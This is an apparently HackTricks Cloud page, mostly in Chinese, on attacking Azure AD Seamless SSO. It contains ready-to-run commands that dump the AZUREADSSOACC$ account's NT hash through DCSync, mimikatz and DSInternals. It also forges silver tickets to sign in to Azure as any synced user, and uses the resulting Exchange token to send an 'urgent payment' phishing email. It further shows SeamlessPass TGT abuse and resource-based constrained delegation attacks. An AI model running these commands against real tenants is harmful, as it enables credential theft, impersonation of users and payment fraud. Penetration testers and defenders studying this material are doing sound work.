Chinese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Seamless SSO

Support HackTricks

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) 自动在用户连接到公司网络的公司设备上自动登录。启用后,用户无需输入密码即可登录 Azure AD,通常甚至无需输入用户名。此功能为用户提供了轻松访问基于云的应用程序的方式,而无需任何额外的本地组件。

基本上,Azure AD Seamless SSO 在用户 在本地域加入的 PC 上 自动登录

它支持 PHS (密码哈希同步)PTA (透传身份验证)

桌面 SSO 使用 Kerberos 进行身份验证。配置后,Azure AD Connect 在本地 AD 中创建一个名为 AZUREADSSOACC$计算机帐户AZUREADSSOACC$ 帐户的密码在配置期间以明文形式发送到 Azure AD

Kerberos 票证使用密码的 NTHash (MD4) 进行 加密,Azure AD 使用发送的密码解密票证。

Azure AD 暴露一个 端点 (https://autologon.microsoftazuread-sso.com),接受 Kerberos 票证。域加入机器的浏览器将票证转发到此端点以实现 SSO。

On-prem -> cloud

用户 AZUREADSSOACC$ 的密码从不更改。因此,域管理员可以破坏该 帐户的哈希,然后使用它来 创建银票 以连接到 Azure,使用 任何已同步的本地用户

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

使用该哈希,您现在可以生成银票

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

To utilize the silver ticket, the following steps should be executed:

  1. 启动浏览器: 应启动 Mozilla Firefox。

  2. 配置浏览器:

  1. 访问Web应用程序:

  • 访问与组织的 AAD 域集成的 Web 应用程序。一个常见的例子是 Office 365

  1. 身份验证过程:

  • 在登录屏幕上,应输入用户名,密码字段留空。

  • 要继续,请按 TAB 或 ENTER。

这不会绕过启用的 MFA

选项 2 无需 dcsync - SeamlessPass

也可以 在没有 dcsync 攻击 的情况下执行此攻击,以更隐蔽,如 在这篇博客文章中解释。为此,您只需要以下之一:

  • 被攻陷用户的 TGT: 即使您没有,但用户被攻陷,您也可以使用许多工具中实现的假 TGT 委托技巧获取一个,例如 KekeoRubeus

  • 黄金票证:如果您拥有 KRBTGT 密钥,您可以为被攻击用户创建所需的 TGT。

  • 被攻陷用户的 NTLM 哈希或 AES 密钥: SeamlessPass 将使用此信息与域控制器通信以生成 TGT。

  • AZUREADSSOACC$ 账户 NTLM 哈希或 AES 密钥: 使用此信息和用户的安全标识符 (SID) 进行攻击,可以创建服务票证并与云进行身份验证(如前面的方法所示)。

最后,使用 TGT 可以使用工具 SeamlessPass 进行:

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>

有关将 Firefox 设置为与无缝 SSO 一起使用的更多信息,可以在 此博客文章中找到

为仅云用户创建 Kerberos 票证

如果 Active Directory 管理员可以访问 Azure AD Connect,他们可以 为任何云用户设置 SID。这样,Kerberos 票证也可以 为仅云用户创建。唯一的要求是 SID 是一个合适的 SID

仅云管理员用户的 SID 现在 被 Microsoft 阻止。 有关信息,请查看 https://aadinternals.com/post/on-prem_admin/

本地 -> 云通过基于资源的受限委派

任何可以管理计算机帐户 (AZUREADSSOACC$) 的人,在该帐户所在的容器或 OU 中,都可以 配置基于资源的受限委派并访问它

python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

参考文献

支持 HackTricks
PreviousAz - PTA - Pass-through AuthenticationNextAz - Arc vulnerable GPO Deploy Script

Last updated